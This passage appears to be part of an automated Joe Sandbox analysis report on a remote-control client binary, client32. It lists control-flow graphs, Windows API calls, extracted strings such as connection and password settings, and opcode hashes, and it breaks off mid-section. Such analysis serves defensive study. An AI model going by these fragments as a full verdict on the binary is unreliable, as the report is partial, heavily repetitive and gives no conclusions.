                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                                                • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                                                • API String ID: 1620732580-3468083601
                                                                                                                • Opcode ID: a52245c749e75159c2902df304c492d0e9983b19c11134f1a5543dcd53e797c4
                                                                                                                • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                                                • Opcode Fuzzy Hash: a52245c749e75159c2902df304c492d0e9983b19c11134f1a5543dcd53e797c4
                                                                                                                • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2692 110869d0-110869ed call 110869c0 2695 110869ef-110869ff call 11162bb7 2692->2695 2696 11086a00-11086a10 call 111457a0 2692->2696 2701 11086a12-11086a1a 2696->2701 2701->2701 2702 11086a1c-11086a22 2701->2702 2703 11086a23-11086a29 2702->2703 2703->2703 2704 11086a2b-11086a62 LoadLibraryA 2703->2704 2705 11086ac9-11086ade GetProcAddress 2704->2705 2706 11086a64-11086a6b 2704->2706 2707 11086b6c-11086b7d call 11162bb7 2705->2707 2708 11086ae4-11086af3 GetProcAddress 2705->2708 2709 11086a6d-11086abe GetModuleFileNameA call 11081e00 LoadLibraryA 2706->2709 2710 11086ac0-11086ac3 2706->2710 2708->2707 2711 11086af5-11086b04 GetProcAddress 2708->2711 2709->2710 2710->2705 2710->2707 2711->2707 2714 11086b06-11086b15 GetProcAddress 2711->2714 2714->2707 2717 11086b17-11086b26 GetProcAddress 2714->2717 2717->2707 2718 11086b28-11086b37 GetProcAddress 2717->2718 2718->2707 2719 11086b39-11086b48 GetProcAddress 2718->2719 2719->2707 2720 11086b4a-11086b59 GetProcAddress 2719->2720 2720->2707 2721 11086b5b-11086b6a GetProcAddress 2720->2721 2721->2707 2722 11086b7e-11086b93 call 11162bb7 2721->2722
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                • API String ID: 2201880244-3035937465
                                                                                                                • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                                                • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                                                • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                                                • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                • API String ID: 3535843008-1834795898
                                                                                                                • Opcode ID: bee2d1a29475935e332d1de4ecb9706c0764932438faa67543dab612aa85e2e2
                                                                                                                • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                                                                • Opcode Fuzzy Hash: bee2d1a29475935e332d1de4ecb9706c0764932438faa67543dab612aa85e2e2
                                                                                                                • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                                                                • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                                                                • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                                                                • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                                                                • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                                                                • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                                                                • _strncpy.LIBCMT ref: 11074E38
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                                                                • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                                                                • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                                                • std::exception::exception.LIBCMT ref: 11075038
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                                • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                                • API String ID: 703120326-1497550179
                                                                                                                • Opcode ID: 4c4de70eae27fa00bb3819321964e2a7d1f65d6f17cf2c5ba64a3656b5ffd917
                                                                                                                • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                                                • Opcode Fuzzy Hash: 4c4de70eae27fa00bb3819321964e2a7d1f65d6f17cf2c5ba64a3656b5ffd917
                                                                                                                • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3081 11139a70-11139a87 3082 11139eb2-11139ec1 call 11162bb7 3081->3082 3083 11139a8d-11139a94 3081->3083 3083->3082 3085 11139a9a-11139aa1 3083->3085 3085->3082 3087 11139aa7-11139aae 3085->3087 3087->3082 3088 11139ab4-11139abb 3087->3088 3088->3082 3089 11139ac1-11139ad1 call 11145c70 3088->3089 3092 11139ad3-11139ada 3089->3092 3093 11139ae0-11139b27 call 1105e820 call 110642e0 3089->3093 3092->3082 3092->3093 3098 11139b35-11139b5e call 1112d860 3093->3098 3099 11139b29-11139b30 3093->3099 3102 11139b64-11139b67 3098->3102 3103 11139c1a-11139c21 call 110ea860 3098->3103 3099->3098 3105 11139b75 3102->3105 3106 11139b69-11139b6e 3102->3106 3112 11139c23-11139c3e call 1105e820 3103->3112 3113 11139c40-11139c4f PostMessageA 3103->3113 3108 11139b7b-11139b86 3105->3108 3106->3105 3107 11139b70-11139b73 3106->3107 3107->3108 3110 11139b88 3108->3110 3111 11139b8d-11139ba5 3108->3111 3110->3111 3123 11139c01-11139c08 3111->3123 3124 11139ba7-11139bad 3111->3124 3112->3113 3115 11139c55-11139c5a 3112->3115 3113->3115 3116 11139c65-11139c69 3115->3116 3117 11139c5c-11139c60 call 11110000 3115->3117 3121 11139c6b-11139c73 3116->3121 3122 11139c8d-11139cb6 call 11131320 call 11147ad0 call 1112da60 call 11162777 3116->3122 3117->3116 3127 11139c75-11139c8b 3121->3127 3128 11139cb9-11139cc1 3121->3128 3122->3128 3125 11139c17 3123->3125 3126 11139c0a-11139c11 call 11132990 3123->3126 3130 11139baf-11139bb4 3124->3130 3131 11139bfc 3124->3131 3125->3103 3126->3125 3144 11139c13 3126->3144 3127->3128 3132 11139cc3-11139cdd call 11162777 call 11162bb7 3128->3132 3133 11139cde-11139d04 call 11143a50 call 11147af0 SetWindowTextA 3128->3133 3130->3131 3136 11139bb6-11139bbb 3130->3136 3131->3123 3155 11139d10-11139d29 call 11162777 * 2 3133->3155 3156 11139d06-11139d0d call 111361c0 3133->3156 3136->3131 3142 11139bbd-11139bdf 3136->3142 3142->3131 3154 11139be1-11139bf0 call 11146710 3142->3154 3144->3125 3164 11139bf2-11139bfa 3154->3164 3168 11139d2b-11139d2f 3155->3168 3169 11139d6e-11139d72 3155->3169 3156->3155 3164->3131 3164->3164 3170 11139d43-11139d4a 3168->3170 3171 11139d31-11139d41 call 111361c0 3168->3171 3172 11139d78-11139d7a 3169->3172 3173 11139e3c-11139e3e 3169->3173 3177 11139d64 3170->3177 3178 11139d4c-11139d61 call 11132120 3170->3178 3171->3170 3171->3178 3179 11139d9c-11139da9 call 110f8b70 3172->3179 3180 11139d7c-11139d7e 3172->3180 3175 11139e40-11139e42 3173->3175 3176 11139e5d-11139e6a call 110f8b70 3173->3176 3183 11139e53-11139e5a call 11132120 3175->3183 3184 11139e44-11139e4e call 111361c0 3175->3184 3194 11139eaf-11139eb1 3176->3194 3195 11139e6c-11139e7c IsWindowVisible 3176->3195 3177->3169 3178->3177 3179->3194 3197 11139daf-11139dc0 IsWindowVisible 3179->3197 3180->3179 3187 11139d80-11139d90 call 111361c0 3180->3187 3183->3176 3184->3183 3187->3179 3201 11139d92-11139d99 call 11132120 3187->3201 3194->3082 3195->3194 3200 11139e7e-11139e89 IsWindowVisible 3195->3200 3197->3194 3202 11139dc6-11139dd6 call 11145c70 3197->3202 3200->3194 3203 11139e8b-11139ead EnableWindow call 11132120 EnableWindow 3200->3203 3201->3179 3202->3194 3210 11139ddc-11139df4 GetForegroundWindow IsWindowVisible 3202->3210 3203->3194 3211 11139e01-11139e0d call 11132120 3210->3211 3212 11139df6-11139dff EnableWindow 3210->3212 3215 11139e0f-11139e15 3211->3215 3216 11139e1e-11139e3b EnableWindow call 11162bb7 3211->3216 3212->3211 3215->3216 3217 11139e17-11139e18 SetForegroundWindow 3215->3217 3217->3216
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A38400), ref: 11145CA0
                                                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                • PostMessageA.USER32(0002045A,000006CF,00000007,00000000), ref: 11139C4F
                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                • SetWindowTextA.USER32(0002045A,00000000), ref: 11139CF7
                                                                                                                • IsWindowVisible.USER32(0002045A), ref: 11139DBC
                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                                                                • IsWindowVisible.USER32(0002045A), ref: 11139DEA
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                                                • EnableWindow.USER32(0002045A,00000001), ref: 11139E27
                                                                                                                • IsWindowVisible.USER32(0002045A), ref: 11139E78
                                                                                                                • IsWindowVisible.USER32(0002045A), ref: 11139E85
                                                                                                                • EnableWindow.USER32(0002045A,00000000), ref: 11139E99
                                                                                                                • EnableWindow.USER32(0002045A,00000000), ref: 11139DFF
                                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(0002045A,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                                                • EnableWindow.USER32(0002045A,00000001), ref: 11139EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                • API String ID: 3453649892-3803836183
                                                                                                                • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                                                • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                                                • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                                                • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3220 110305f5-110305fc 3221 11030600-11030610 3220->3221 3221->3221 3222 11030612-11030619 3221->3222 3223 1103061b-1103062d 3222->3223 3224 1103065d 3222->3224 3229 11030650-11030657 3223->3229 3230 1103062f-1103064e wsprintfA 3223->3230 3225 11030662-1103067d call 1105e820 3224->3225 3231 11030703-1103071d call 1102a520 call 11139600 call 11145c70 3225->3231 3232 11030683-11030693 call 11145c70 3225->3232 3229->3224 3229->3231 3230->3225 3245 1103071f-11030726 3231->3245 3246 1103075e-11030765 3231->3246 3232->3231 3238 11030695-110306ce call 1105e820 call 111101b0 3232->3238 3250 110306e1 3238->3250 3251 110306d0-110306df call 1109dd30 3238->3251 3248 11030776-110307a1 call 110286c0 call 1102d190 PostMessageA 3245->3248 3249 11030728-1103072f 3245->3249 3246->3248 3252 11030767-1103076f call 11143a20 3246->3252 3268 110307a3-110307ad PostMessageA 3248->3268 3269 110307af-110307ca 3248->3269 3249->3252 3255 11030731-11030756 call 1105e820 3249->3255 3254 110306e3-110306fe call 1109e5b0 3250->3254 3251->3254 3252->3248 3263 11030771 call 1102d830 3252->3263 3254->3231 3255->3246 3263->3248 3268->3269 3271 110307d8-110307f3 3269->3271 3272 110307cc-110307d6 PostMessageA 3269->3272 3274 11030801-1103081f call 11147060 call 11027810 call 1102d900 3271->3274 3275 110307f5-110307ff PostMessageA 3271->3275 3272->3271 3281 1103081f call 1102d900 3274->3281 3275->3274
                                                                                                                APIs
                                                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                                                • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostwsprintf
                                                                                                                • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                                                • API String ID: 875889313-3431570279
                                                                                                                • Opcode ID: 2b61c38f017bed57c92655f0d7e560a34b8dc01c16e3a6b7c0ac1e0e1303e311
                                                                                                                • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                                                • Opcode Fuzzy Hash: 2b61c38f017bed57c92655f0d7e560a34b8dc01c16e3a6b7c0ac1e0e1303e311
                                                                                                                • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                                                APIs
                                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                                • InterlockedExchange.KERNEL32(02AE8E08,00001388), ref: 110313BA
                                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                                                • API String ID: 1428277488-3745656997
                                                                                                                • Opcode ID: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
                                                                                                                • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                                                • Opcode Fuzzy Hash: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
                                                                                                                • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                                                APIs
                                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                                • InterlockedExchange.KERNEL32(02AE8E08,00001388), ref: 110313BA
                                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                                • _sprintf.LIBCMT ref: 11031401
                                                                                                                • _setlocale.LIBCMT ref: 1103140B
                                                                                                                Strings
                                                                                                                Memory Dump Source
